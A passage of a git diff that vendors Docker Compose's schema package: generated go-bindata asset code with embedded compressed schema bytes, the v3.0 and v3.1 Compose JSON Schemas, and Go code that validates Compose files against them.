5\xac\xf0\x39\xe8\x04\xd8\xd6\x8d\x37\x53\x5f\x5c\x08\x93\xab\xfa\xc7\x28\xd3\x05\x0f\x10\x01\x69\x7c\xec\xc5\xb2\x79\x66\x37\xec\x62\x0d\x1c\x22\x18\x49\x08\x07\xbb\x57\x91\x23\x6a\x98\x1f\x3e\x44\xfa\x84\x0b\xf7\xb7\x59\x5c\x0f\xaa\x97\x66\x7c\x8f\x1c\x20\x75\x66\xa5\x09\x37\x17\x23\x9b\x40\xb4\xfd\xe0\x16\x9e\xe3\xc2\x9f\x2b\x9a\x0c\x61\x06\x18\x67\x42\x4d\xa2\xeb\xe7\x94\xfb\x76\xeb\x9b\xab\x3d\x17\xf8\x80\x09\x94\x30\x3e\xb5\x6c\x19\x23\x80\xe8\x28\xf5\x08\x40\x45\xc6\x28\x39\x46\x40\x4a\x85\x44\xf0\x40\x21\x21\xaf\x05\x56\xc7\x8c\x71\xb5\x78\x9f\x21\xf7\x55\x26\xf1\x37\x18\x5b\xf3\x9c\xef\x3b\x42\x1b\x8b\x21\x6b\x42\x72\xa5\x41\x7d\x29\x29\x1c\xc6\x8e\x44\x18\x4c\x54\xe1\x14\x95\x4a\x56\x8b\x3c\xf6\x80\xad\xf7\x44\xa2\x84\xd8\x23\xbc\x76\xb7\x71\xd8\xcc\x03\x97\x97\x00\x4f\x0a\x5d\x67\xc2\x50\x55\xb6\x7f\x9b\x79\xe5\xe4\x0c\x7d\x79\x94\xb9\xba\xae\x5b\x93\xaa\xc0\x34\x63\x1c\x68\x30\x36\xa4\x62\x3c\x2b\x05\xca\x21\xe3\x20\x30\x73\xaa\x62\x6d\x46\x7a\x51\x0b\xa4\xf7\x9f\x92\x91\xb8\xa4\x88\x84\xc2\x4c\x55\x7c\x77\xe5\xb1\x52\xa9\x70\xb0\xd7\x04\x57\xd8\x1f\x34\x0e\xaf\x8d\xe8\x00\xda\xea\xef\x2e\xfa\x33\x05\xff\xcc\x29\xa6\x0a\x4a\xed\x26\x53\xa7\x9a\xe9\x39\xe7\x5b\xce\x88\x5e\x73\x8f\xc4\xd8\xa0\x33\x7c\x24\x6d\x60\xee\x94\x1b\xc1\xd5\x89\x3a\xf9\x1a\xdd\x75\x34\xf4\xd6\x1d\x23\x1b\x27\xfc\x45\xc5\xdc\x66\x63\xe3\xad\xa7\xee\xa0\xaa\x65\xf0\x58\xd0\xc0\x50\x39\xd7\xd2\x0e\xa0\xc6\xd0\x7e\xd1\x6a\xa1\xdb\x64\x1d\x04\x05\x76\x73\xbb\xb2\x24\xbb\x60\xec\x6e\x9d\x58\x7b\x02\xae\x79\xb2\x09\x1a\x9c\xbf\xcf\xcf\xb6\x3b\x20\xef\xdc\x19\x4b\xb4\xb5\x26\xae\xae\xe0\xd6\xde\x28\x0e\xe1\x1c\x23\x40\x09\x6c\xd9\xa5\x4f\xd4\x66\x3e\x01\xf9\x3a\xc7\x46\x0a\x57\xc0\x6a\x77\xc1\x5b\x99\xfe\xdd\x21\xa5\xc6\x5c\x3e\x60\x54\x03\xd2\xb6\xe9\xe3\x60\xd4\xbe\xbb\x0c\x1a\x2e\x26\x48\x04\x70\x82\x73\x24\x43\x89\xe8\x86\xf1\x44\xcd\x0b\xa4\x20\x6b\xef\x65\x2f\x4a\xfd\x33\x39\x9f\x23\x81\x08\x01\x82\x65\x15\x93\x43\xd3\x02\x08\x3a\x5e\x55\x3e\x1b\xf4\x1d\xc2\xa4\x16\x90\xa1\x5c\x75\x57\xbf\x01\x9f\x4b\x2b\x46\xb1\x62\xce\x0c\x11\xb7\x65\x85\x9e\xb3\x7e\xdb\x06\x24\xd4\xd9\x8c\x9b\xfa\xd8\xc9\x82\xe1\x09\x6d\xe3\x77\x59\x75\x9e\x31\xd1\xb9\xd6\x7b\x3c\xa6\xdf\x71\x22\xba\x00\xa9\x33\xc9\x30\xf8\x09\xe2\x07\x4b\x4b\x77\xca\xc8\x38\x23\x38\x3f\x2e\x25\x61\xce\x68\xab\xe4\x18\x87\xb8\xd1\x03\xb5\x3b\xe8\x56\xa8\xe2\x2a\x18\xac\x0d\xc2\x57\x4c\x0b\xf6\xf5\x82\x0d\x97\x73\x25\x4e\x50\x0e\x56\xbe\xbb\x55\xd1\x52\x09\x84\xa9\xba\xb8\x9c\xdf\x2a\xd6\x0d\xd5\x7c\xf0\xcf\x40\xd6\x1f\xe0\xc2\xf7\xe8\x9e\x4c\x9f\xf3\x3a\x38\x0d\xac\xa0\x62\xc2\xe9\x80\x0b\x3c\xf4\x08\x89\xd8\x83\x2d\x50\xd5\xa2\xc6\xc7\x1d\x54\xc6\xf8\xf2\xa7\x8d\xf0\x88\x78\x13\x4e\x48\x98\xa3\x6a\xa9\xe8\x88\x1e\xa8\xa7\xce\x1a\x9c\xcc\xcf\x2d\x12\xff\xec\x22\xc4\x75\x98\xf7\x0e\x42\xd6\x5b\xea\x19\x21\x4c\x4f\x19\xae\x5b\xfe\xf8\x63\xca\xc9\x7f\x28\xb9\x2d\xe9\xf5\x77\x61\x1e\xab\x3e\x0e\x3d\xf3\x7a\xd0\xd5\x26\xda\xc4\xde\x8b\xa8\xe5\xf8\x6f\xda\x77\x7b\x44\xe0\xea\xf3\x2f\xec\x04\x6f\x48\x2e\xdd\x8b\xa6\x40\x6e\xe9\xa0\xfe\x4f\x2d\xff\x11\x47\xfc\x79\xfe\xd5\x3d\x20\x0b\xbe\xdc\x6a\xa0\xae\x2e\xce\x11\xcf\x95\x5e\x81\xcd\x5e\xda\x14\xe3\xc1\xa2\x61\x92\xe9\x99\x7f\x4e\x93\xd1\xf7\x69\x1d\xc6\x66\xcc\x86\x0d\xe6\x78\xe3\x3b\xae\x90\x73\x83\xa4\x1e\xc4\x73\xbf\x62\x6d\xda\x29\x71\x5e\xf2\x05\x93\xcd\xfd\xbb\x99\x3e\x60\xee\xde\xfb\x07\x15\xd0\x05\x86\x74\x6e\x9b\x5a\x87\x87\x5e\xbb\xd3\x77\x9b\x9e\xf8\x37\xf0\x27\xaf\x38\xb5\x9c\xf4\x38\x99\x49\x7d\x1f\x0f\x5a\xdb\x17\x98\x9b\x91\x7e\x2c\x90\xf6\x15\x89\x91\xdd\x37\xe6\x79\xca\x67\x46\xe7\xdb\x4e\x7b\xcc\xdb\xbf\xb1\xf4\xdc\x6a\xac\xcc\xbf\xcd\x7b\xd8\xd5\x69\xf5\x6f\x00\x00\x00\xff\xff\xfc\xf3\x11\x6a\x88\x2f\x00\x00") + +func dataConfig_schema_v31JsonBytes() ([]byte, error) { + return bindataRead( + _dataConfig_schema_v31Json, + "data/config_schema_v3.1.json", + ) +} + +func dataConfig_schema_v31Json() (*asset, error) { + bytes, err := dataConfig_schema_v31JsonBytes() + if err != nil { + return nil, err + } + + info := bindataFileInfo{name: "data/config_schema_v3.1.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)} + a := &asset{bytes: bytes, info: info} + return a, nil +} + +// Asset loads and returns the asset for the given name. +// It returns an error if the asset could not be found or +// could not be loaded. +func Asset(name string) ([]byte, error) { + cannonicalName := strings.Replace(name, "\\", "/", -1) + if f, ok := _bindata[cannonicalName]; ok { + a, err := f() + if err != nil { + return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err) + } + return a.bytes, nil + } + return nil, fmt.Errorf("Asset %s not found", name) +} + +// MustAsset is like Asset but panics when Asset would return an error. +// It simplifies safe initialization of global variables. +func MustAsset(name string) []byte { + a, err := Asset(name) + if err != nil { + panic("asset: Asset(" + name + "): " + err.Error()) + } + + return a +} + +// AssetInfo loads and returns the asset info for the given name. +// It returns an error if the asset could not be found or +// could not be loaded. +func AssetInfo(name string) (os.FileInfo, error) { + cannonicalName := strings.Replace(name, "\\", "/", -1) + if f, ok := _bindata[cannonicalName]; ok { + a, err := f() + if err != nil { + return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err) + } + return a.info, nil + } + return nil, fmt.Errorf("AssetInfo %s not found", name) +} + +// AssetNames returns the names of the assets. +func AssetNames() []string { + names := make([]string, 0, len(_bindata)) + for name := range _bindata { + names = append(names, name) + } + return names +} + +// _bindata is a table, holding each asset generator, mapped to its name. +var _bindata = map[string]func() (*asset, error){ + "data/config_schema_v3.0.json": dataConfig_schema_v30Json, + "data/config_schema_v3.1.json": dataConfig_schema_v31Json, +} + +// AssetDir returns the file names below a certain +// directory embedded in the file by go-bindata. +// For example if you run go-bindata on data/... and data contains the +// following hierarchy: +// data/ +// foo.txt +// img/ +// a.png +// b.png +// then AssetDir("data") would return []string{"foo.txt", "img"} +// AssetDir("data/img") would return []string{"a.png", "b.png"} +// AssetDir("foo.txt") and AssetDir("notexist") would return an error +// AssetDir("") will return []string{"data"}. +func AssetDir(name string) ([]string, error) { + node := _bintree + if len(name) != 0 { + cannonicalName := strings.Replace(name, "\\", "/", -1) + pathList := strings.Split(cannonicalName, "/") + for _, p := range pathList { + node = node.Children[p] + if node == nil { + return nil, fmt.Errorf("Asset %s not found", name) + } + } + } + if node.Func != nil { + return nil, fmt.Errorf("Asset %s not found", name) + } + rv := make([]string, 0, len(node.Children)) + for childName := range node.Children { + rv = append(rv, childName) + } + return rv, nil +} + +type bintree struct { + Func func() (*asset, error) + Children map[string]*bintree +} +var _bintree = &bintree{nil, map[string]*bintree{ + "data": &bintree{nil, map[string]*bintree{ + "config_schema_v3.0.json": &bintree{dataConfig_schema_v30Json, map[string]*bintree{}}, + "config_schema_v3.1.json": &bintree{dataConfig_schema_v31Json, map[string]*bintree{}}, + }}, +}} + +// RestoreAsset restores an asset under the given directory +func RestoreAsset(dir, name string) error { + data, err := Asset(name) + if err != nil { + return err + } + info, err := AssetInfo(name) + if err != nil { + return err + } + err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755)) + if err != nil { + return err + } + err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode()) + if err != nil { + return err + } + err = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime()) + if err != nil { + return err + } + return nil +} + +// RestoreAssets restores an asset under the given directory recursively +func RestoreAssets(dir, name string) error { + children, err := AssetDir(name) + // File + if err != nil { + return RestoreAsset(dir, name) + } + // Dir + for _, child := range children { + err = RestoreAssets(dir, filepath.Join(name, child)) + if err != nil { + return err + } + } + return nil +} + +func _filePath(dir, name string) string { + cannonicalName := strings.Replace(name, "\\", "/", -1) + return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...) +} + diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json new file mode 100644 index 0000000000..fbcd8bb859 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json @@ -0,0 +1,383 @@ +{ + "$schema": "http://json-schema.org/draft-04/schema#", + "id": "config_schema_v3.0.json", + "type": "object", + "required": ["version"], + + "properties": { + "version": { + "type": "string" + }, + + "services": { + "id": "#/properties/services", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/service" + } + }, + "additionalProperties": false + }, + + "networks": { + "id": "#/properties/networks", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/network" + } + } + }, + + "volumes": { + "id": "#/properties/volumes", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/volume" + } + }, + "additionalProperties": false + } + }, + + "additionalProperties": false, + + "definitions": { + + "service": { + "id": "#/definitions/service", + "type": "object", + + "properties": { + "deploy": {"$ref": "#/definitions/deployment"}, + "build": { + "oneOf": [ + {"type": "string"}, + { + "type": "object", + "properties": { + "context": {"type": "string"}, + "dockerfile": {"type": "string"}, + "args": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + } + ] + }, + "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "cgroup_parent": {"type": "string"}, + "command": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "container_name": {"type": "string"}, + "depends_on": {"$ref": "#/definitions/list_of_strings"}, + "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "dns": {"$ref": "#/definitions/string_or_list"}, + "dns_search": {"$ref": "#/definitions/string_or_list"}, + "domainname": {"type": "string"}, + "entrypoint": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "env_file": {"$ref": "#/definitions/string_or_list"}, + "environment": {"$ref": "#/definitions/list_or_dict"}, + + "expose": { + "type": "array", + "items": { + "type": ["string", "number"], + "format": "expose" + }, + "uniqueItems": true + }, + + "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "extra_hosts": {"$ref": "#/definitions/list_or_dict"}, + "healthcheck": {"$ref": "#/definitions/healthcheck"}, + "hostname": {"type": "string"}, + "image": {"type": "string"}, + "ipc": {"type": "string"}, + "labels": {"$ref": "#/definitions/list_or_dict"}, + "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + + "logging": { + "type": "object", + + "properties": { + "driver": {"type": "string"}, + "options": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number", "null"]} + } + } + }, + "additionalProperties": false + }, + + "mac_address": {"type": "string"}, + "network_mode": {"type": "string"}, + + "networks": { + "oneOf": [ + {"$ref": "#/definitions/list_of_strings"}, + { + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "oneOf": [ + { + "type": "object", + "properties": { + "aliases": {"$ref": "#/definitions/list_of_strings"}, + "ipv4_address": {"type": "string"}, + "ipv6_address": {"type": "string"} + }, + "additionalProperties": false + }, + {"type": "null"} + ] + } + }, + "additionalProperties": false + } + ] + }, + "pid": {"type": ["string", "null"]}, + + "ports": { + "type": "array", + "items": { + "type": ["string", "number"], + "format": "ports" + }, + "uniqueItems": true + }, + + "privileged": {"type": "boolean"}, + "read_only": {"type": "boolean"}, + "restart": {"type": "string"}, + "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "shm_size": {"type": ["number", "string"]}, + "sysctls": {"$ref": "#/definitions/list_or_dict"}, + "stdin_open": {"type": "boolean"}, + "stop_grace_period": {"type": "string", "format": "duration"}, + "stop_signal": {"type": "string"}, + "tmpfs": {"$ref": "#/definitions/string_or_list"}, + "tty": {"type": "boolean"}, + "ulimits": { + "type": "object", + "patternProperties": { + "^[a-z]+$": { + "oneOf": [ + {"type": "integer"}, + { + "type":"object", + "properties": { + "hard": {"type": "integer"}, + "soft": {"type": "integer"} + }, + "required": ["soft", "hard"], + "additionalProperties": false + } + ] + } + } + }, + "user": {"type": "string"}, + "userns_mode": {"type": "string"}, + "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "working_dir": {"type": "string"} + }, + "additionalProperties": false + }, + + "healthcheck": { + "id": "#/definitions/healthcheck", + "type": "object", + "additionalProperties": false, + "properties": { + "disable": {"type": "boolean"}, + "interval": {"type": "string"}, + "retries": {"type": "number"}, + "test": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "timeout": {"type": "string"} + } + }, + "deployment": { + "id": "#/definitions/deployment", + "type": ["object", "null"], + "properties": { + "mode": {"type": "string"}, + "replicas": {"type": "integer"}, + "labels": {"$ref": "#/definitions/list_or_dict"}, + "update_config": { + "type": "object", + "properties": { + "parallelism": {"type": "integer"}, + "delay": {"type": "string", "format": "duration"}, + "failure_action": {"type": "string"}, + "monitor": {"type": "string", "format": "duration"}, + "max_failure_ratio": {"type": "number"} + }, + "additionalProperties": false + }, + "resources": { + "type": "object", + "properties": { + "limits": {"$ref": "#/definitions/resource"}, + "reservations": {"$ref": "#/definitions/resource"} + } + }, + "restart_policy": { + "type": "object", + "properties": { + "condition": {"type": "string"}, + "delay": {"type": "string", "format": "duration"}, + "max_attempts": {"type": "integer"}, + "window": {"type": "string", "format": "duration"} + }, + "additionalProperties": false + }, + "placement": { + "type": "object", + "properties": { + "constraints": {"type": "array", "items": {"type": "string"}} + }, + "additionalProperties": false + } + }, + "additionalProperties": false + }, + + "resource": { + "id": "#/definitions/resource", + "type": "object", + "properties": { + "cpus": {"type": "string"}, + "memory": {"type": "string"} + }, + "additionalProperties": false + }, + + "network": { + "id": "#/definitions/network", + "type": ["object", "null"], + "properties": { + "driver": {"type": "string"}, + "driver_opts": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number"]} + } + }, + "ipam": { + "type": "object", + "properties": { + "driver": {"type": "string"}, + "config": { + "type": "array", + "items": { + "type": "object", + "properties": { + "subnet": {"type": "string"} + }, + "additionalProperties": false + } + } + }, + "additionalProperties": false + }, + "external": { + "type": ["boolean", "object"], + "properties": { + "name": {"type": "string"} + }, + "additionalProperties": false + }, + "internal": {"type": "boolean"}, + "labels": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + }, + + "volume": { + "id": "#/definitions/volume", + "type": ["object", "null"], + "properties": { + "driver": {"type": "string"}, + "driver_opts": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number"]} + } + }, + "external": { + "type": ["boolean", "object"], + "properties": { + "name": {"type": "string"} + }, + "additionalProperties": false + }, + "labels": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + }, + + "string_or_list": { + "oneOf": [ + {"type": "string"}, + {"$ref": "#/definitions/list_of_strings"} + ] + }, + + "list_of_strings": { + "type": "array", + "items": {"type": "string"}, + "uniqueItems": true + }, + + "list_or_dict": { + "oneOf": [ + { + "type": "object", + "patternProperties": { + ".+": { + "type": ["string", "number", "null"] + } + }, + "additionalProperties": false + }, + {"type": "array", "items": {"type": "string"}, "uniqueItems": true} + ] + }, + + "constraints": { + "service": { + "id": "#/definitions/constraints/service", + "anyOf": [ + {"required": ["build"]}, + {"required": ["image"]} + ], + "properties": { + "build": { + "required": ["context"] + } + } + } + } + } +} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json new file mode 100644 index 0000000000..b7037485f9 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json @@ -0,0 +1,428 @@ +{ + "$schema": "http://json-schema.org/draft-04/schema#", + "id": "config_schema_v3.1.json", + "type": "object", + "required": ["version"], + + "properties": { + "version": { + "type": "string" + }, + + "services": { + "id": "#/properties/services", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/service" + } + }, + "additionalProperties": false + }, + + "networks": { + "id": "#/properties/networks", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/network" + } + } + }, + + "volumes": { + "id": "#/properties/volumes", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/volume" + } + }, + "additionalProperties": false + }, + + "secrets": { + "id": "#/properties/secrets", + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "$ref": "#/definitions/secret" + } + }, + "additionalProperties": false + } + }, + + "additionalProperties": false, + + "definitions": { + + "service": { + "id": "#/definitions/service", + "type": "object", + + "properties": { + "deploy": {"$ref": "#/definitions/deployment"}, + "build": { + "oneOf": [ + {"type": "string"}, + { + "type": "object", + "properties": { + "context": {"type": "string"}, + "dockerfile": {"type": "string"}, + "args": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + } + ] + }, + "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "cgroup_parent": {"type": "string"}, + "command": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "container_name": {"type": "string"}, + "depends_on": {"$ref": "#/definitions/list_of_strings"}, + "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "dns": {"$ref": "#/definitions/string_or_list"}, + "dns_search": {"$ref": "#/definitions/string_or_list"}, + "domainname": {"type": "string"}, + "entrypoint": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "env_file": {"$ref": "#/definitions/string_or_list"}, + "environment": {"$ref": "#/definitions/list_or_dict"}, + + "expose": { + "type": "array", + "items": { + "type": ["string", "number"], + "format": "expose" + }, + "uniqueItems": true + }, + + "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "extra_hosts": {"$ref": "#/definitions/list_or_dict"}, + "healthcheck": {"$ref": "#/definitions/healthcheck"}, + "hostname": {"type": "string"}, + "image": {"type": "string"}, + "ipc": {"type": "string"}, + "labels": {"$ref": "#/definitions/list_or_dict"}, + "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + + "logging": { + "type": "object", + + "properties": { + "driver": {"type": "string"}, + "options": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number", "null"]} + } + } + }, + "additionalProperties": false + }, + + "mac_address": {"type": "string"}, + "network_mode": {"type": "string"}, + + "networks": { + "oneOf": [ + {"$ref": "#/definitions/list_of_strings"}, + { + "type": "object", + "patternProperties": { + "^[a-zA-Z0-9._-]+$": { + "oneOf": [ + { + "type": "object", + "properties": { + "aliases": {"$ref": "#/definitions/list_of_strings"}, + "ipv4_address": {"type": "string"}, + "ipv6_address": {"type": "string"} + }, + "additionalProperties": false + }, + {"type": "null"} + ] + } + }, + "additionalProperties": false + } + ] + }, + "pid": {"type": ["string", "null"]}, + + "ports": { + "type": "array", + "items": { + "type": ["string", "number"], + "format": "ports" + }, + "uniqueItems": true + }, + + "privileged": {"type": "boolean"}, + "read_only": {"type": "boolean"}, + "restart": {"type": "string"}, + "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "shm_size": {"type": ["number", "string"]}, + "secrets": { + "type": "array", + "items": { + "oneOf": [ + {"type": "string"}, + { + "type": "object", + "properties": { + "source": {"type": "string"}, + "target": {"type": "string"}, + "uid": {"type": "string"}, + "gid": {"type": "string"}, + "mode": {"type": "number"} + } + } + ] + } + }, + "sysctls": {"$ref": "#/definitions/list_or_dict"}, + "stdin_open": {"type": "boolean"}, + "stop_grace_period": {"type": "string", "format": "duration"}, + "stop_signal": {"type": "string"}, + "tmpfs": {"$ref": "#/definitions/string_or_list"}, + "tty": {"type": "boolean"}, + "ulimits": { + "type": "object", + "patternProperties": { + "^[a-z]+$": { + "oneOf": [ + {"type": "integer"}, + { + "type":"object", + "properties": { + "hard": {"type": "integer"}, + "soft": {"type": "integer"} + }, + "required": ["soft", "hard"], + "additionalProperties": false + } + ] + } + } + }, + "user": {"type": "string"}, + "userns_mode": {"type": "string"}, + "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, + "working_dir": {"type": "string"} + }, + "additionalProperties": false + }, + + "healthcheck": { + "id": "#/definitions/healthcheck", + "type": "object", + "additionalProperties": false, + "properties": { + "disable": {"type": "boolean"}, + "interval": {"type": "string"}, + "retries": {"type": "number"}, + "test": { + "oneOf": [ + {"type": "string"}, + {"type": "array", "items": {"type": "string"}} + ] + }, + "timeout": {"type": "string"} + } + }, + "deployment": { + "id": "#/definitions/deployment", + "type": ["object", "null"], + "properties": { + "mode": {"type": "string"}, + "replicas": {"type": "integer"}, + "labels": {"$ref": "#/definitions/list_or_dict"}, + "update_config": { + "type": "object", + "properties": { + "parallelism": {"type": "integer"}, + "delay": {"type": "string", "format": "duration"}, + "failure_action": {"type": "string"}, + "monitor": {"type": "string", "format": "duration"}, + "max_failure_ratio": {"type": "number"} + }, + "additionalProperties": false + }, + "resources": { + "type": "object", + "properties": { + "limits": {"$ref": "#/definitions/resource"}, + "reservations": {"$ref": "#/definitions/resource"} + } + }, + "restart_policy": { + "type": "object", + "properties": { + "condition": {"type": "string"}, + "delay": {"type": "string", "format": "duration"}, + "max_attempts": {"type": "integer"}, + "window": {"type": "string", "format": "duration"} + }, + "additionalProperties": false + }, + "placement": { + "type": "object", + "properties": { + "constraints": {"type": "array", "items": {"type": "string"}} + }, + "additionalProperties": false + } + }, + "additionalProperties": false + }, + + "resource": { + "id": "#/definitions/resource", + "type": "object", + "properties": { + "cpus": {"type": "string"}, + "memory": {"type": "string"} + }, + "additionalProperties": false + }, + + "network": { + "id": "#/definitions/network", + "type": ["object", "null"], + "properties": { + "driver": {"type": "string"}, + "driver_opts": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number"]} + } + }, + "ipam": { + "type": "object", + "properties": { + "driver": {"type": "string"}, + "config": { + "type": "array", + "items": { + "type": "object", + "properties": { + "subnet": {"type": "string"} + }, + "additionalProperties": false + } + } + }, + "additionalProperties": false + }, + "external": { + "type": ["boolean", "object"], + "properties": { + "name": {"type": "string"} + }, + "additionalProperties": false + }, + "internal": {"type": "boolean"}, + "labels": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + }, + + "volume": { + "id": "#/definitions/volume", + "type": ["object", "null"], + "properties": { + "driver": {"type": "string"}, + "driver_opts": { + "type": "object", + "patternProperties": { + "^.+$": {"type": ["string", "number"]} + } + }, + "external": { + "type": ["boolean", "object"], + "properties": { + "name": {"type": "string"} + }, + "additionalProperties": false + }, + "labels": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + }, + + "secret": { + "id": "#/definitions/secret", + "type": "object", + "properties": { + "file": {"type": "string"}, + "external": { + "type": ["boolean", "object"], + "properties": { + "name": {"type": "string"} + } + }, + "labels": {"$ref": "#/definitions/list_or_dict"} + }, + "additionalProperties": false + }, + + "string_or_list": { + "oneOf": [ + {"type": "string"}, + {"$ref": "#/definitions/list_of_strings"} + ] + }, + + "list_of_strings": { + "type": "array", + "items": {"type": "string"}, + "uniqueItems": true + }, + + "list_or_dict": { + "oneOf": [ + { + "type": "object", + "patternProperties": { + ".+": { + "type": ["string", "number", "null"] + } + }, + "additionalProperties": false + }, + {"type": "array", "items": {"type": "string"}, "uniqueItems": true} + ] + }, + + "constraints": { + "service": { + "id": "#/definitions/constraints/service", + "anyOf": [ + {"required": ["build"]}, + {"required": ["image"]} + ], + "properties": { + "build": { + "required": ["context"] + } + } + } + } + } +} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema.go b/vendor/github.com/docker/docker/cli/compose/schema/schema.go new file mode 100644 index 0000000000..ae33c77fbe --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/schema/schema.go @@ -0,0 +1,137 @@ +package schema + +//go:generate go-bindata -pkg schema -nometadata data + +import ( + "fmt" + "strings" + "time" + + "github.com/pkg/errors" + "github.com/xeipuuv/gojsonschema" +) + +const ( + defaultVersion = "1.0" + versionField = "version" +) + +type portsFormatChecker struct{} + +func (checker portsFormatChecker) IsFormat(input string) bool { + // TODO: implement this + return true +} + +type durationFormatChecker struct{} + +func (checker durationFormatChecker) IsFormat(input string) bool { + _, err := time.ParseDuration(input) + return err == nil +} + +func init() { + gojsonschema.FormatCheckers.Add("expose", portsFormatChecker{}) + gojsonschema.FormatCheckers.Add("ports", portsFormatChecker{}) + gojsonschema.FormatCheckers.Add("duration", durationFormatChecker{}) +} + +// Version returns the version of the config, defaulting to version 1.0 +func Version(config map[string]interface{}) string { + version, ok := config[versionField] + if !ok { + return defaultVersion + } + return normalizeVersion(fmt.Sprintf("%v", version)) +} + +func normalizeVersion(version string) string { + switch version { + case "3": + return "3.0" + default: + return version + } +} + +// Validate uses the jsonschema to validate the configuration +func Validate(config map[string]interface{}, version string) error { + schemaData, err := Asset(fmt.Sprintf("data/config_schema_v%s.json", version)) + if err != nil { + return errors.Errorf("unsupported Compose file version: %s", version) + } + + schemaLoader := gojsonschema.NewStringLoader(string(schemaData)) + dataLoader := gojsonschema.NewGoLoader(config) + + result, err := gojsonschema.Validate(schemaLoader, dataLoader) + if err != nil { + return err + } + + if !result.Valid() { + return toError(result) + } + + return nil +} + +func toError(result *gojsonschema.Result) error { + err := getMostSpecificError(result.Errors()) + description := getDescription(err) + return fmt.Errorf("%s %s", err.Field(), description) +} + +func getDescription(err gojsonschema.ResultError) string { + if err.Type() == "invalid_type" { + if expectedType, ok := err.Details()["expected"].(string); ok { + return fmt.Sprintf("must be a %s", humanReadableType(expectedType)) + } + } + + return err.Description() +} + +func humanReadableType(definition string) string { + if definition[0:1] == "[" { + allTypes := strings.Split(definition[1:len(definition)-1], ",") + for i, t := range allTypes { + allTypes[i] = humanReadableType(t) + } + return fmt.Sprintf( + "%s or %s", + strings.Join(allTypes[0:len(allTypes)-1], ", "), + allTypes[len(allTypes)-1], + ) + } + if definition == "object" { + return "mapping" + } + if definition == "array" { + return "list" + } + return definition +} + +func getMostSpecificError(errors []gojsonschema.ResultError) gojsonschema.ResultError { + var mostSpecificError gojsonschema.ResultError + + for _, err := range errors { + if mostSpecificError == nil { + mostSpecificError = err + } else if specificity(err) > specificity(mostSpecificError) { + mostSpecificError = err + } else if specificity(err) == specificity(mostSpecificError) { + // Invalid type errors win in a tie-breaker for most specific field name + if err.Type() == "invalid_type" && mostSpecificError.Type() != "invalid_type" { + mostSpecificError = err + } + } + } + + return mostSpecificError +} + +func specificity(err gojsonschema.ResultError) int { + return len(strings.Split(err.Field(), ".")) +} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go b/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go new file mode 100644 index 0000000000..0935d4022e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go @@ -0,0 +1,52 @@ +package schema + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +type dict map[string]interface{} + +func TestValidate(t *testing.T) { + config := 